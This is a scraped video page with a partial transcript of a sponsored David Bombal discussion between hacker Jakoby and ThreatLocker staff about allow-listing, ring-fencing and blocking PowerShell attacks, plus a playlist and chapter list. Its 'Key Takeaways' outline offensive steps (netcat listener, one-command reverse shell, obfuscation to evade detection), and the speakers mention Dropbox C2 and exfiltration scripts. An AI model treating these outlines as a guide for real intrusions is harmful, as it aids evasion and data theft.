dabbled with the concept of using like maybe this is dumb and crazy but have you da with the thought of using this as an anti-che for video games we have not no sorry okay I got a second maybe the maybe the nerds in the room have but we we have you have I was just thinking about that because I so they have like all these streamers and they're they're all cheating like there's so many of them they're cheating it's ridiculous so I used to do system checks like I would hop on with some of those streamers and do system checks and i' different Powershell scripts and such to look for you know different programs different what whatever it was um look through the registry because like uh some of the bigger ones like they all make registry entries and it's so predictable it's easy to find but like nobody would trust me to like actively have stuff on their system to stop them from cheating like that's actually kind of big because it's ruining the whole Community yeah actually is I we are talk right now talking about uh partnering with these tourn ship organizers uh that run millions and millions of tournaments to harden their machines so no one can cheat on the tournaments oh my God because you learn you learn the game everything that that the game needs to run and we block everything else so they're trying to run a script wall hack inbut ESP nothing will pass so yes I I was just really think about that you guys could do some uh you guys could do some work in the anti Chi area on it we're on it that was my first week my God my first week here um that was like my my big my big thought okay oh my I love you guys so much oh my God feelings mutual jaab oh my God I'm so sorry I just I thought about that spur the moment why team team do work together man no D it's great I think someone like you doesn't get enough recognition and it's great to see you know you guys working together on this you could save online gaming you could save online gaming like it's ruined everybody hates it like all right I'll cut that for there but we got to talk recently crowd strike had this blue screen wonderful event obviously very sarcastic comment um how is this different and how is that not going to happen to to my environment if I run this so um yes the unfortunate event there's a few different things or a few things I suppose we do differently um to tools like crowd strike not only crowd strike um first and foremost because we are primarily a proactive as I said default Andy um solution we don't require constant updates to the program basically it does what it does irrespec for the most part of the threat that's thrown at it so we don't need to respond to individual threats to individual known bad behaviors because we're not depending on detecting those individual threats or known bad behaviors so the software itself the agent itself updates very irregularly or not regularly if I could put it that way um we unlike something like Crow strike which because of the nature of detection they have to push out updates that fundamentally change their driver you know upwards of 10 times a day we typically wouldn't change our driver 10 times in a year and obviously because of that we can be a lot more careful and slower and more considered in terms of rolling a new version of threat Locker out a new version of the driver out so again it's not something that's going to be changing 10 times a day it's more likely do 10 times a year and is done very carefully and slowly and in stages the other thing I should mention by the way is obviously our driver does in the grand scheme of things not very much it gives information to the service and then it performs actions it's not doing too much outside of that because most of our processing is done in the service the service is not running in the kernel so the service is not something that would potentially cause a machine like you know if the service crashes it recovers if the driver crashes it's blue screen town so because most of the processing it's on the service it's very unlikely no that's that's honestly that's huge actually as far as like you know everything's in scope and in uh in ratio so without having that many interactions between 10 a day to 10 a year and then never of course pushing on a Friday ever exactly what about zero days same principle again because we block everything we don't need to block individual threats generally speaking uh I mean the same principle applies to lots of stuff remote codex ution I mean I've seen you'll probably remember this one jackob remember print nightmare um I've seen print nightmare being exploited or trying to be exploited on a machine running thrat locker and it's really interesting because you see Prince poer creates a dll dll tries to execute execution get blocked by thr Locker because default and I for the most part and again look Never Say Never and nothing is ever 100% secure and guaranteed 100% secure but for the most part we don't need to respond to individual zero days for the most part something is going to try and run which we will probably block or something is going to try to happen like the L bins that jackob mentioned um being used and hopefully we will control them so I'm just trying to think of the questions that the audience would have right next question is um operating systems which operating systems are supported uh so basically Windows Mac and Linux um Windows technically from Windows 7 onwards and as well as that nice it feels so weird to say this in 2024 we do have a XP agent that has just become available but look it's it's a it's a sad fact that some customers do have you know uh OT machines basically running XP um similarly various flavors of Linux um obviously as well so Linux agent is just been released or is is only recently recently been released but uh Mac OS as well obviously so last three versions of Mac OS has supported too one of the you know one of the biggest concerns I think for businesses I mean and you guys can tell me you know based on your experience as working with many businesses is if a secretary has a laptop or a computer right they only should be running a very limited number of um of apps and I suppose that's where you're you know blocking everything by default you're only going to allow that person to run Word and Excel and perhaps a few other applications did I did I understand that right correct I mean realistically 98% of users do the same things with the same software every single day you know what I mean they use office they use browsers they use video conferencing tool Team Zoom you know maybe Aline a business application or two and the fact is if that's all they're doing then realistically we're not going to get in their way you know it's when they start downloading you know team viewer or some random coupon slipper from China then absolutely we're going to step in and block that but that's what most organizations will want but obviously there's differences between your average user and say a developer or an IT admin or something like that so it's about learning the oh something else that just got blocked drop box uh it's about learning what is required on each of in each individual's machines a human being making decisions about hang on a second well any desk shouldn't be allowed in this environment so let's block that okay team viewer shouldn't be allowed in this environment let's block that I mean the one thing that organizations will get if they deploy this is complete visibility over what's running in their machines and that is basically step one in controlling what's on your machines is knowing what's there and basically in every single instance that I've worked with a customer deploying this there is always a surprise there there was always something on their machines that they had no idea was there and immediately go get that off or turn that off right now so it could be a remote access tool it could be a you know a winr or seven zip or it could be you know 15 random coupon clipping extensions whatever the case may be there's always surprises but visibility is his first St in control um cuz that that warning that just popped up was literally the perfect example while you were explaining what just happened because I just wiped this computer and now if you don't know uh what I think of Windows 10 on this one but the Dropbox came as a pre-install and the very first C2 that I made public two year or it's been three years now once I came once I came public on this name the very first C2 I dropped was a Dropbox C2 which comes standard with the system now and they still determined hey we didn't we didn't agree that you should have that and they that was a that was standard that was just installed that was a fresh install right there and it came with it so for someone like me I already have a DropBox C2 that's ready I just got to get one single file in there and it's over and you guys just BL you blocked it live while talking about it that was kind of cool so I didn't mean to jump it on you but that was cool mean you you must dude it's great because it's I think we really need this something we discussed in our last interview there was a there's this huge problem where the big companies big corporates aren't engaging with the ethical hacking community so it's fantastic to see you know this discussion because it's really important that companies engage with a good guys like you you know who are trying to try the stuff but not try and sell it on the on the dog web look we we've got so much to learn we've got so much to learn and that that's part of the reason why we're here yeah there's a big difference between the companies that are trying to do right and protect you and the ones that are just trying to check boxes so they're not liable if something happens that makes a huge difference because a lot of the exploits that I find for example the reason Microsoft didn't pay me out is because it didn't fit within the parameters of what they would call bounties or it didn't it didn't there was no box to check if they implemented what I told them to so they just decided it wasn't worth it but like you just saw with like the descriptions in the Parell modules being a store malware in there that's still just free I I wanted to ask about fishing because it's a huge problem so if I'm a non-technical user and I get some fishing email what's going to happen uh fundamentally you're going to be able to click on the link now one of our recently added components is what we call Cloud detect uh Cloud detect is again we fundamentally we've got a protection platform which is everything we've mentioned so far we've got detection which is looking for anomalous behavior and responding to it much like a traditional or like a traditional EDR um we've also added Cloud detection to that detection product which basically lets you pull in logs from Office 365 to again look for anomalous Behavior so the reality is it would probably be detected in that Cloud detect product fundamentally We Can't Stop users from clicking on links they shouldn't click on I mean we're not an email security product per se we will block things like as I mentioned earlier on the likes of excel calling Powershell or you know Outlook calling Powershell we will control all of those interactions but actual fishing links themselves we can't really follow or stop a user from following it and I mean we do mitigate user stupidity to some extent but there's only so much can do but I mean if the user tried to download something off that link or that would be abely no 100% that would be blocked straight away I'm just talking about credential theft more than anything else um no if they try to download anything and get blocked or they try and use you know say run a Parell script or anything like that obviously is going to be you know control just the same as you saw with Jack this tests yeah but you could restrict which websites people go to right so you could stop them going to like certain absolutely the world and I hate to use examples but like certain like say I'm a US company and all the customers I with on the US then you could just restrict them to the US is that correct uh that is a feature that is coming soon I don't want to get too specific on it so geolocation or geob blocking is a feature that's coming soon um right now I mean obviously you can block particular locations websites you know so if you want to block Mega or drop box is another great example because file sharing utilities is a really good way of exfiltrating data and again legitimate file sharing utilities all the better because your AV or edor is probably not going to kick off about it so you can very easily set up policies to block access to dropbox.com or mega.nz or whatever other tools that you want two two more things real quick one when you're talking about all those different uh softwares for xill trading stuff Dropbox Etc I've literally authored all of those I have made Powershell scripts to use every single one of them one of the pages on my site literally goes through all of them one at a time I almost if it uses Powershell though it will will probably block all of them again not because of specific Network deny it's just because Powershell can't get out in the internet and also I did want to point out uh that David you had brought up about uh blocking websites from other countries uh we do also have the software Health Report where it isn't websites but it'll tell you what applications are running in your environment and where they're based out of so uh you can just see oh maybe I don't want you know software running from a certain country uh you can just go in that and then find what's running uh from each country you don't want it running from and then just you know remove that software so Nico you picking it up on the like the the Management console thing right um yes I um we have unified a and you can see all the traffic that's going in there another funny thing as well is that um while we're also um putting in Source control putting Network control I also put in some detect policies because um since I knew You' using Powershell in the worst case scenario if any of our applications ring fence weren't be to run um one thing I knew no matter how you tried to hide everything says it's Powershell you'd have to run it using invoke expression so I made a little policy that checked for the use of I ex or invoke expression so we have a alert for every single time that you've ran every every single time that you've ran your um your Sager on the computer I want to a you this because this is in the back of my mind is management of this it sounds like a lot of work or is that incorrect to say that so that's specifically speaking about Jacob's environment and setting up Jacob's environment so as I said we did sort of sprinkle a little extra security dust on that particular setup but for most organizations we have a set of what would be best described as one size fits most policies that most environments can basically run with comfortably you know with one or two addition maybe a line of business application or two so in most cases it is just a case of pushing the agent out learning what's there having the policies created automatically so there's no heavy lift um one of the other things um for anybody who has ever had any experience with allow listing Solutions in general they'll know that probably the biggest problem with allow listing aside from building those initial policies is the problem of what happens when software updates um and generally speaking what happens happens when software updates with most tools is it breaks because hash changes your allow listing tool goes look I know that file is called acrobat doxe but it doesn't match my hash so I'm going to block it from running and then you have to respond you have to get things added Etc so one of the sort of secret Source parts of throut locker is we have this concept of what are called built-in applications which is a database of over 4,000 common applications that we track and monitor and update when they update so if acrobat updates we're going to basically capture those files those hashes add them them to what are called our built-in definitions they get pushed down to any customer who's using them automatically so what that means is those customers don't need to worry about updates to software causing problems we're effectively taking that responsibility on for them so between those two things the automated learning at the beginning and also the um built-in applications for Mo in most cases it is just a case of push it out jump on a call with us a week later we'll show you everything that's been learned do you want to turn this off no do you want to turn that off no you know repeat that maybe once or twice maybe three times at most at and it's just an hour uh a call repeat that a couple of times at the end of which you'll be in a position where you can turn it on safe and secure and the knowledge that it ain't going to break things so it's not a heavy lift and I just say David and I have spoken to customers who have implemented similar Solutions and I know what a pain it can be I mean I spoke to one organization who have spent and this is not an exaggeration four years on a project four years on a project trying implemental L listing and they still haven't turned it on well sorry I tell a lie they turned it on once and it blw screened a bunch of machines and they turn it off really quickly but that's the kind of undertaking it used to be whereas we've got Solutions Engineers who working with you know customers of tens of thousands machines that they get secured in you know six seven eight calls another question I think a lot of people have is support you know it's great to have a product but what happens with things go wrong or I'm not sure what it do what kind of support do you guys have 247 365 uh and I know I'm biased but the best in the business by a distance um I've been on the other side I've been the IT guy dealing with a vendor and I know the pain of not getting good support and you know logging a ticket and somebody gets back to you days later going hey is this a problem um obviously the nature of what we do speed is important if somebody has a problem with something they need to get that problems fixed quickly so we have as I said 247 365 human beings answering calls or answering um chats not AI not Bots um and I think the average is somewhere between 20 and 30 seconds currently um so you will talk to a human being you will talk to a human being who will be able to help you and quickly so yeah support is the best in the business as far as I'm concerned and same applies to the solutions Engineers so the guys who actually help with the onboarding so they're literally the tech resource that you know helps a customer through every step of the process from configuring all the different modules what they should do what they shouldn't do best practices what they should look out for all that kind of stuff it's all free it's all included in license cost there's no implementation cost there's no extra charge for any of that it's all as I said included and again best in the business by a distance jacobe I've got to give you the last word man what are your thoughts I think it's really cool that someone is trying to do something outside of just checking the boxes like coming down to it at the end of the day um they're creating new boxes and finding new boxes that need to be checked and not just trying to uh maintain safety against liabilities I just think that's probably one of the biggest strengths that they have being able to step outside and look outside the box and acknowledge other variables that other people aren't even looking at and I must say from my side the reason that we did this video is because of that interview where you mentioned them and recommended them as being like the only company that was able to block your stuff and I pretty confident you know if they can block you then the world's going to be a much safer place so thanks to everyone who joined this call and you know thanks to everyone who's watching please put your comments below I'm hoping that we will see more with jacobe and threadlocker and you know you can come back for another like demo and hopefully they'll beat you jacobe but I mean as you said better sweet

Original Description

Big thanks to ThreatLocker for sponsoring this video. To start your free trial with ThreatLocker please use the following link: https://www.threatlocker.com/davidbombal NOTE: Jakobyโ€™s video freezes from time to time because he had to use a backup Internet connection as a result of the hurricanes experienced in the USA over the past few weeks. Apologies for the frame freezing. Fortunately his audio and demos were not affected :) // YouTube Video REFERENCE // Mind Blowing. Reverse Shell Demo with DNS data bouncing exfiltration!: https://youtu.be/JFWnMMte3f0 // I am Jakobyโ€™s SOCIAL// YouTube: https://www.youtube.com/c/IamJakoby LinkedIn: https://www.linkedin.com/in/i-am-jakoby X: https://x.com/i_am_jakoby Instagram: https://www.instagram.com/i_am_jakoby/ GitHub: https://github.com/I-Am-Jakoby TikTok: https://www.tiktok.com/@i_am_jakoby Reddit: https://www.reddit.com/user/jakobyscream/?rdt=49010 Discord: https://discord.com/servers/i-am-jakoby-495265922135621632 // David's SOCIAL // Discord: https://discord.com/invite/usKSyzb X: https://www.twitter.com/davidbombal Instagram: https://www.instagram.com/davidbombal LinkedIn: https://www.linkedin.com/in/davidbombal Facebook: https://www.facebook.com/davidbombal.co TikTok: http://tiktok.com/@davidbombal YouTube: https://www.youtube.com/@davidbombal // MY STUFF // https://www.amazon.com/shop/davidbombal // SPONSORS // Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com // MENU // 0:00 - Intro 00:53 - Polymorphic Reverse shell generator generator 02:34 - ThreatLocker's Ringfencing 05:06 - Jakoby vs machine without ThreatLocker demo 09:57 - Jakoby vs machine with ThreatLocker demo 22:22 - How ThreatLocker blocks attacks 25:37 - The power of Powershell 31:28 - LolBins demo 34:44 - How ThreatLocker works // Behavioural detection 41:10 - ThreatLocker wins 42:17 - Jakoby/ThreatLocker discussions 49:13 - How ThreatLocker protects 53:04 - The future of online-gaming ant
Watch on YouTube โ†— (saves to browser)
Sign in to unlock AI tutor explanation ยท โšก30

Playlist

Uploads from David Bombal ยท David Bombal ยท 0 of 60

โ† Previous Next โ†’
1 RYU SDN Controller Part 4: Graphical User Interface (GUI): Practical GNS3 SDN and OpenFlow
RYU SDN Controller Part 4: Graphical User Interface (GUI): Practical GNS3 SDN and OpenFlow
David Bombal
2 HPE Network Protector SDN Application Part 1 - Introduction
HPE Network Protector SDN Application Part 1 - Introduction
David Bombal
3 HPE Network Protector SDN Application Part 2 : DNS Interception using OpenFlow
HPE Network Protector SDN Application Part 2 : DNS Interception using OpenFlow
David Bombal
4 HPE Network Protector SDN Application Part 3 - Lab Setup using Physical Switches
HPE Network Protector SDN Application Part 3 - Lab Setup using Physical Switches
David Bombal
5 HPE Network Protector SDN Application Part 4 - Demo of malicious websites blocked
HPE Network Protector SDN Application Part 4 - Demo of malicious websites blocked
David Bombal
6 HPE Network Protector SDN Application Part 5 - Demo OpenFlow table interception flows
HPE Network Protector SDN Application Part 5 - Demo OpenFlow table interception flows
David Bombal
7 HPE Network Protector SDN Application Part 6 - Demo of Physical Switch configuration
HPE Network Protector SDN Application Part 6 - Demo of Physical Switch configuration
David Bombal
8 HPE Network Protector SDN Application Part 7 - Demo Service Insertion Tunnel / GRE Tunnel
HPE Network Protector SDN Application Part 7 - Demo Service Insertion Tunnel / GRE Tunnel
David Bombal
9 HPE Network Protector SDN Application Part 8 - Demo SDN OpenFlow Reporting
HPE Network Protector SDN Application Part 8 - Demo SDN OpenFlow Reporting
David Bombal
10 HPE Network Protector SDN Application Part 9 - Demo switches interception of DNS traffic
HPE Network Protector SDN Application Part 9 - Demo switches interception of DNS traffic
David Bombal
11 GNS3 Talks: GNS3 version 1.5.X Appliance Tips
GNS3 Talks: GNS3 version 1.5.X Appliance Tips
David Bombal
12 CCNA 200-125 Exam: AAA demo: TACACS+ with GNS3
CCNA 200-125 Exam: AAA demo: TACACS+ with GNS3
David Bombal
13 GNS3 2.0.0 beta 2 install
GNS3 2.0.0 beta 2 install
David Bombal
14 CCNA #012: Learn SNMP with GNS3, Wireshark and Solarwinds NPM - CCNA 200-125 exam
CCNA #012: Learn SNMP with GNS3, Wireshark and Solarwinds NPM - CCNA 200-125 exam
David Bombal
15 CCNA #013: Spanning Tree CCNA Exam Questions: Know the answer? CCNA 200-125 exam
CCNA #013: Spanning Tree CCNA Exam Questions: Know the answer? CCNA 200-125 exam
David Bombal
16 GNS3 2.0.0 beta : GNS3 VM integration with GNS3 GUI
GNS3 2.0.0 beta : GNS3 VM integration with GNS3 GUI
David Bombal
17 CCNA #018: Routing exam questions: Who wins? OSPF, EIGRP or RIP? Sure? CCNA 200-125 exam
CCNA #018: Routing exam questions: Who wins? OSPF, EIGRP or RIP? Sure? CCNA 200-125 exam
David Bombal
18 CCNA #019: Spanning Tree CCNA Exam Questions: Root Bridge, Root Port and more: CCNA 200-125 exam
CCNA #019: Spanning Tree CCNA Exam Questions: Root Bridge, Root Port and more: CCNA 200-125 exam
David Bombal
19 GNS3 Download, installation and configuration - GNS3 1.5.3 and Windows 10
GNS3 Download, installation and configuration - GNS3 1.5.3 and Windows 10
David Bombal
20 CCNA #023 EIGRP Neighbor Troubleshooting (DUAL Issues) for the CCNA 200-125 Exam
CCNA #023 EIGRP Neighbor Troubleshooting (DUAL Issues) for the CCNA 200-125 Exam
David Bombal
21 GNS3 2.0 Architecture and schema Part 1: What is the GNS3 Controller?
GNS3 2.0 Architecture and schema Part 1: What is the GNS3 Controller?
David Bombal
22 GNS3 2.0 Architecture and schema Part 2: Emulators and virtualization
GNS3 2.0 Architecture and schema Part 2: Emulators and virtualization
David Bombal
23 CCNA #028 VTP Troubleshooting for the CCNA 200-125 Exam
CCNA #028 VTP Troubleshooting for the CCNA 200-125 Exam
David Bombal
24 CCNA #029 VTP & DTP Troubleshooting for the CCNA 200-125 Exam
CCNA #029 VTP & DTP Troubleshooting for the CCNA 200-125 Exam
David Bombal
25 CCNA #030 VTP Troubleshooting for the CCNA 200-125 Exam
CCNA #030 VTP Troubleshooting for the CCNA 200-125 Exam
David Bombal
26 GNS3 : How to download Cisco IOS images and VIRL images. Which is the best? How do you get them?
GNS3 : How to download Cisco IOS images and VIRL images. Which is the best? How do you get them?
David Bombal
27 GNS3 ASA setup: Import and configure Cisco ASAv with GNS3
GNS3 ASA setup: Import and configure Cisco ASAv with GNS3
David Bombal
28 GNS3 switching setup and options: Cisco and other switching options in GNS3
GNS3 switching setup and options: Cisco and other switching options in GNS3
David Bombal
29 GNS3 switching setup and options Part 2: GNS3 unmanaged built-in switch
GNS3 switching setup and options Part 2: GNS3 unmanaged built-in switch
David Bombal
30 GNS3 switching setup and options Part 3: Router on a sick with GNS3 unmanaged built-in switch
GNS3 switching setup and options Part 3: Router on a sick with GNS3 unmanaged built-in switch
David Bombal
31 GNS3 switching setup and options Part 4: Etherswitch Router for Cisco Dynamips Part 1
GNS3 switching setup and options Part 4: Etherswitch Router for Cisco Dynamips Part 1
David Bombal
32 GNS3 switching setup and options Part 5: Etherswitch Router for Cisco Dynamips Part 2
GNS3 switching setup and options Part 5: Etherswitch Router for Cisco Dynamips Part 2
David Bombal
33 GNS3 switching setup and options Part 6: Etherswitch, Wireshark, 802.1Q, InterVLAN routing
GNS3 switching setup and options Part 6: Etherswitch, Wireshark, 802.1Q, InterVLAN routing
David Bombal
34 GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 1: GNS3 Switching Part 7
GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 1: GNS3 Switching Part 7
David Bombal
35 GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 2: GNS3 Switching Part 8
GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 2: GNS3 Switching Part 8
David Bombal
36 GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 3: GNS3 Switching Part 9
GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 3: GNS3 Switching Part 9
David Bombal
37 GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 4: GNS3 Switching Part 10
GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 4: GNS3 Switching Part 10
David Bombal
38 GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 5: GNS3 Switching Part 11
GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 5: GNS3 Switching Part 11
David Bombal
39 GNS3 Nexus (NX-OSv) switch setup and configuration Part 1: GNS3 switching options Part 12
GNS3 Nexus (NX-OSv) switch setup and configuration Part 1: GNS3 switching options Part 12
David Bombal
40 GNS3 Nexus (NX-OSv) switch setup and configuration Part 2: GNS3 switching options Part 13
GNS3 Nexus (NX-OSv) switch setup and configuration Part 2: GNS3 switching options Part 13
David Bombal
41 GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 6: GNS3 Switching Part 14
GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 6: GNS3 Switching Part 14
David Bombal
42 GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 7: GNS3 Switching Part 15
GNS3 Talks: Docker, Open vSwitch, SDN and OpenFlow Part 7: GNS3 Switching Part 15
David Bombal
43 GNS3 Cisco CSR 1000v setup and configuration Part 1: GNS3 NFV
GNS3 Cisco CSR 1000v setup and configuration Part 1: GNS3 NFV
David Bombal
44 GNS3 Cisco CSR 1000v setup and configuration Part 2: GNS3 NFV
GNS3 Cisco CSR 1000v setup and configuration Part 2: GNS3 NFV
David Bombal
45 GNS3 Talks: Use the NAT node to connect GNS3 to the Internet easily!
GNS3 Talks: Use the NAT node to connect GNS3 to the Internet easily!
David Bombal
46 GNS3 Talks: GNS3 2.0 RC1 is now available
GNS3 Talks: GNS3 2.0 RC1 is now available
David Bombal
47 GNS3 Talks: GNS3 2.0 Portable Projects - easily export and import GNS3 projects
GNS3 Talks: GNS3 2.0 Portable Projects - easily export and import GNS3 projects
David Bombal
48 GNS3 Talks: Multiple clients sharing projects in real time, plus console session shadowing!
GNS3 Talks: Multiple clients sharing projects in real time, plus console session shadowing!
David Bombal
49 CCNA #035 NAT Troubleshooting Scenario 1 - Can you find the issue? CCNA Exam 200-125 troubleshooting
CCNA #035 NAT Troubleshooting Scenario 1 - Can you find the issue? CCNA Exam 200-125 troubleshooting
David Bombal
50 CCNA #036 NAT Troubleshooting Scenario 2 - Can you find the issue? CCNA Exam 200-125 troubleshooting
CCNA #036 NAT Troubleshooting Scenario 2 - Can you find the issue? CCNA Exam 200-125 troubleshooting
David Bombal
51 GNS3 Talks: ESXi, GNS3 VM and KVM support Part 1: leverage servers and the cloud
GNS3 Talks: ESXi, GNS3 VM and KVM support Part 1: leverage servers and the cloud
David Bombal
52 CCNA #037 OSPF Troubleshooting - can you find the issue? CCNA Exam 200-125 troubleshooting
CCNA #037 OSPF Troubleshooting - can you find the issue? CCNA Exam 200-125 troubleshooting
David Bombal
53 GNS3 Talks: ESXi, GNS3 VM and KVM support Part 2:  leverage servers and the cloud
GNS3 Talks: ESXi, GNS3 VM and KVM support Part 2: leverage servers and the cloud
David Bombal
54 CCNA #038 NAT Troubleshooting Scenario 3 - Can you find the issue? CCNA Exam 200-125 troubleshooting
CCNA #038 NAT Troubleshooting Scenario 3 - Can you find the issue? CCNA Exam 200-125 troubleshooting
David Bombal
55 CCNA #039 - OSPF DR, BR and DROTHER Election - do you know the answers?
CCNA #039 - OSPF DR, BR and DROTHER Election - do you know the answers?
David Bombal
56 CCNA #040 NAT Troubleshooting Scenario 4 - Can you find the issue? CCNA Exam 200-125 troubleshooting
CCNA #040 NAT Troubleshooting Scenario 4 - Can you find the issue? CCNA Exam 200-125 troubleshooting
David Bombal
57 GNS3 Talks: Arista vEOS GNS3 import and configuration Part 1
GNS3 Talks: Arista vEOS GNS3 import and configuration Part 1
David Bombal
58 CCNA #041 - OSPF DR, BR and DROTHER Election - do you know the answers?
CCNA #041 - OSPF DR, BR and DROTHER Election - do you know the answers?
David Bombal
59 GNS3 Talks: Arista vEOS GNS3 import and configuration Part 2
GNS3 Talks: Arista vEOS GNS3 import and configuration Part 2
David Bombal
60 GNS3 Talks: ipterm: Linux, Docker, Python, SDN and more! Part 1
GNS3 Talks: ipterm: Linux, Docker, Python, SDN and more! Part 1
David Bombal

This video teaches how to stop a reverse shell in Powershell using ThreatLocker and other tools, and discusses various techniques and concepts related to cybersecurity and behavior-based detection. The speaker demonstrates how to implement ring fencing and zero trust model to prevent malware attacks.

Key Takeaways
  1. Run a netcat listener on the intermediary box
  2. Implement a reverse shell with a single command
  3. Obfuscate the reverse shell to evade detection
  4. Use a jump box between themselves and the target system
  5. Keep segregation between the jump box and the API itself
  6. Use ThreatLocker to block Powershell connections to certain sites
๐Ÿ’ก ThreatLocker's behavior-based detection and ring fencing can effectively block reverse shell attacks without requiring configuration or tweaking.
๐Ÿ”’ Pro feature: Ask AI to explain this lesson โ†’

Related Reads

๐Ÿ“ฐ
Keunggulan Teknologi Arjuna138: Sistem Fair Play dan Kemenangan Terjamin
Arjuna138 prioritizes fair play and secure gaming experiences, ensuring player trust in online gaming platforms
Dev.to AI
๐Ÿ“ฐ
The MCP attack your code review cannot see
Learn to identify MCP attacks in your codebase that can bypass traditional code reviews
Dev.to ยท Kiell Tampubolon
๐Ÿ“ฐ
Securing the Amnesiac Cloud: Database-Free Token Auth in Apps Script Web Apps
Learn to secure your Apps Script web apps with database-free token auth and server-side RBAC using CacheService
Dev.to ยท Hayrullah Kar
๐Ÿ“ฐ
How one line in my log scanner's allowlist was muting alerts I never told it to
Learn how a single line in a log scanner's allowlist can unexpectedly mute alerts and how to avoid this issue in your own projects
Dev.to ยท TiltedLunar123

Chapters (13)

Intro
0:53 Polymorphic Reverse shell generator generator
2:34 ThreatLocker's Ringfencing
5:06 Jakoby vs machine without ThreatLocker demo
9:57 Jakoby vs machine with ThreatLocker demo
22:22 How ThreatLocker blocks attacks
25:37 The power of Powershell
31:28 LolBins demo
34:44 How ThreatLocker works // Behavioural detection
41:10 ThreatLocker wins
42:17 Jakoby/ThreatLocker discussions
49:13 How ThreatLocker protects
53:04 The future of online-gaming ant
Up next
DPDPA India for CISOs โ€“ A pragmatic approach to essentials vs. hearsay
AKITRA
Watch โ†’